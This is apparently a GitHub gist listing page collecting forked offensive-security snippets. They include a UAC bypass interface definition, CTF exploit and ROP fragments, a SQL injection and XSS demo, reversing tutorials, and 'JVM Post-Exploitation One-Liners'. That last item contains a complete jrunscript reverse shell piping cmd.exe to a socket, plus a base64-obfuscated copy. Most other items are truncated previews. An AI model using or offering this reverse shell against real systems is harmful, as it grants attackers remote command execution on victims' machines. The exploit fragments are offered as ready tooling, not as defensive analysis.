Skip to content

Instantly share code, notes, and snippets.

@idkwim
idkwim / akagi_58a.c
Created October 24, 2019 05:26 — forked from hfiref0x/akagi_58a.c
UAC bypass using EditionUpgradeManager COM interface
typedef interface IEditionUpgradeManager IEditionUpgradeManager;
typedef struct IEditionUpgradeManagerVtbl {
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE *QueryInterface)(
__RPC__in IEditionUpgradeManager * This,
__RPC__in REFIID riid,

Reversing Raw Binary Firmware Files in Ghidra

This brief tutorial will show you how to go about analyzing a raw binary firmware image in Ghidra.

Prep work in Binwalk

I was recently interested in reversing some older Cisco IOS images. Those images come in the form of a single binary blob, without any sort of ELF, Mach-o, or PE header to describe the binary.

While I am using Cisco IOS Images in this example, the same process should apply to other Raw Binary Firmware Images.

@idkwim
idkwim / JVM_POST_EXPLOIT.md
Created July 29, 2019 13:39 — forked from frohoff/JVM_POST_EXPLOIT.md
JVM Post-Exploitation One-Liners

Nashorn / Rhino:

  • Reverse Shell
$ jrunscript -e 'var host="localhost"; var port=8044; var cmd="cmd.exe"; var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'
  • Reverse Shell (Base-64 encoded)
$ jrunscript -e 'eval(new java.lang.String(javax.xml.bind.DatatypeConverter.parseBase64Binary("dmFyIGhvc3Q9ImxvY2FsaG9zdCI7IHZhciBwb3J0PTgwNDQ7IHZhciBjbWQ9ImNtZC5leGUiOyB2YXIgcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKGNtZCkucmVkaXJlY3RFcnJvclN0cmVhbSh0cnVlKS5zdGFydCgpO3ZhciBzPW5ldyBqYXZhLm5ldC5Tb2NrZXQoaG9zdCxwb3J0KTt2YXIgcGk9cC5nZXRJbnB1dFN0cmVhbSgpLHBlPXAuZ2V
@idkwim
idkwim / jacking75_CSharp_System
Created July 23, 2019 04:27 — forked from jacking75/jacking75_CSharp_System
C# 시스템 프로그래밍
==다른 프로세스 실행==
System.Diagnostics.Process.Start("실행파일경로\실행파일명.exe",파라메터)
System.Diagnostics.Process.Start("cmd.exe 명령어");
==프로세스 종료==
System.Diagnostics.Close(); // 프로세스의 리소스를 해재(종료) 시킨다.
System.Diagnostics.CloseMainWindow(); // UI가 있는 프로세스에 메시지를 보내 종료 시킨다.
System.Diagnostics.Kill(); // 즉시 프로세스를 종료시킨다.
@idkwim
idkwim / webs01.py
Created July 2, 2019 08:37 — forked from hackeris/webs01.py
SQL Injection and XSS demo on flask(Python).
# -*- coding: utf-8 -*-
import os
import sqlite3
from flask import Flask
from flask import redirect
from flask import request
from flask import session
from jinja2 import Template
@idkwim
idkwim / exploit.html
Created June 24, 2019 01:08 — forked from ujin5/exploit.html
Google CTF Quals 2019 Monochromatic
<html>
<pre id='log'></pre>
<script src="mojo_bindings.js"></script>
<script src="third_party/blink/public/mojom/blob/blob_registry.mojom.js"></script>
<script src="being_creator_interface.mojom.js"></script>
<script src="food_interface.mojom.js"></script>
<script src="dog_interface.mojom.js"></script>
<script src="person_interface.mojom.js"></script>
<script src="cat_interface.mojom.js"></script>
<script>
//#define LOCAL_EXP
#ifdef LOCAL_EXP
printf("Testing ROP chain \n");
vm_address_t payload =0x118800000;
kern_return_t kr = vm_allocate(mach_task_self(),&payload,payload_size,0);
CHECK_MACH_ERR(kr,"vm_allocate()");
memcpy((void*)payload, main_payload,payload_size);
char *buf = malloc(1000);
memset(buf,0xcc,1000);
@idkwim
idkwim / remote
Created January 23, 2019 06:25 — forked from Jinmo/remote
scripts
#!/bin/bash
# ./remote server port 'menu string'
touch "$1" || (echo "Cannot create file named $1" && exit 1)
exec > "$1"
echo 'from pwn import *'
echo ''
echo -e "HOST, PORT = \"$2\", \"$3\""
if [ ! -n "$HOST" ]; then HOST=0.0.0.0; fi
@idkwim
idkwim / exploit-heapheaven.py
Created January 21, 2019 02:37 — forked from n30m1nd/exploit-heapheaven.py
Hack.lu 2017 - HeapHeaven write-up
#!/usr/bin/python
# Hack.lu CTF 2017 - HeapHeaven solution by n30m1nd
# Challenge by FluxFingers - https://flatearth.fluxfingers.net/
from pwn import *
from sys import *
from struct import *
def translate_baby(size):
@idkwim
idkwim / Reversing Aruba Instant.md
Created January 20, 2019 10:49
Reversing Aruba Instant Firmware

Aruba produces two different software loads for their Access Point hardware. The first is called ArubaOS and the second is called Aruba Instant. With ArubaOS, the AP requires a Mobility Controller (hardware) to be installed in the network. With the Aruba Instant it is possible to run AP’s independently (standalone mode) or in a cluster, with no Mobility Controller in the network.